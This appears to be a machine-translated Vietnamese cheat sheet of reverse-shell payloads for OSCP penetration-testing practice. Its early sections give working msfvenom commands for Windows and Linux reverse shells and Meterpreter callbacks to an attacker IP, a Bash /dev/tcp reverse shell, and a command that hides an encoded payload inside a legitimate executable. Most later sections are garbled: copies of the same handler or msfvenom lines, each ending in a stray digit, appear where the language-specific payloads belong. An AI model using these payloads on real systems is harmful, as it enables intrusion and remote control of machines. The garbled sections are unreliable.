Hướng dẫn windows php reverse shell oscp - cửa sổ php đảo ngược shell oscp

Reverse-shells

Đây là bộ sưu tập tuyệt vời của các loại vỏ và web ngược khác nhau. Nhiều trong số những cái được liệt kê dưới đây đến từ trò lừa đảo này: https: //highon.coffee/blog/reverse-hell-cheat-heet/
https://highon.coffee/blog/reverse-shell-cheat-sheet/

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

MSFVENOM

Có một sự khác biệt quan trọng giữa tải trọng không dàn dựng và dàn dựng. Một vỏ không được giới hạn được gửi qua trong một khối. Bạn chỉ cần gửi vỏ trong một giai đoạn. Điều này có thể được bắt với Metasploit Multi-Handler. Mà còn với Netcat.non-staged shell is sent over in one block. You just send shell in one stage. This can be caught with metasploit multi-handler. But also with netcat.

Vỏ được dàn dựng gửi chúng lần lượt. Điều này có thể hữu ích khi bạn có bộ đệm rất nhỏ cho shellcode của mình, vì vậy bạn cần chia tải trọng. Đồng hồ đo là một vỏ được dàn dựng. Đầu tiên, nó gửi một số phần của nó và thiết lập kết nối, và sau đó nó gửi thêm một số. Điều này có thể được bắt với Metasploit Multi-Handler nhưng không phải với Netcat. shells send them in turn. This can be useful for when you have very small buffer for your shellcode, so you need to divide up the payload. Meterpreter is a staged shell. First it sends some parts of it and sets up the connection, and then it sends some more. This can be caught with metasploit multi-handler but not with netcat.

các cửa sổ

Đồng hồ đo

Máy đo tiêu chuẩn

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -o shell_reverse.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp

Đồng hồ đo HTTPS

Nó làm cho đồng hồ giao thông trông bình thường. Vì nó được ẩn trong HTTPS, giao tiếp được mã hóa và có thể được sử dụng để bỏ qua các cuộc kiểm tra gói sâu.

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe

Tải trọng không được dàn dựng

msfvenom -p windows/shell_reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o shell_reverse_tcp.exe
use exploit/multi/handler
set payload windows/shell_reverse_tcp

Tải trọng được dàn dựng

msfvenom -p windows/shell/reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o staged_reverse_tcp.exe

Điều này phải được bắt với metasploit. Nó không hoạt động với Netcat.

use exploit/multi/handler
set payload windows/shell/reverse_tcp

Tiêm tải trọng vào nhị phân

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -e x86/shikata_ga_nai -i 9 -x "/somebinary.exe" -o bad_binary.exe

Linux

Nhị phân

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f elf > shell.elf

Bash

0<&196;exec 196<>/dev/tcp/192.168.1.101/80; sh <&196 >&196 2>&196
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
0

PHP

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
1

Netcat

Bind Shell

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
2

Đảo ngược vỏ

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
3

Với -e cờ

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
4
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
5

Không có cờ

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
6

Ncat

NCAT là một phiên bản tốt hơn và hiện đại hơn của Netcat. Một tính năng mà NetCat không có là mã hóa. Nếu bạn đang ở trên một pentestjob, bạn có thể không muốn giao tiếp không được mã hóa.

Trói buộc

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
7

Telnet

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
8
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
9

Perl

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe
0

Ruby

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe
1

Java

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe
2

Python

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe
3

Shells Web - Nền tảng độc lập

PHP

Bóng PHP này là độc lập với hệ điều hành. Bạn có thể sử dụng nó trên cả Linux và Windows.

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe
4

Asp

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe
5

CHIẾN TRANH

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe
6

JSP

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe
7

Kết quả khớp với """

Không có kết quả phù hợp với """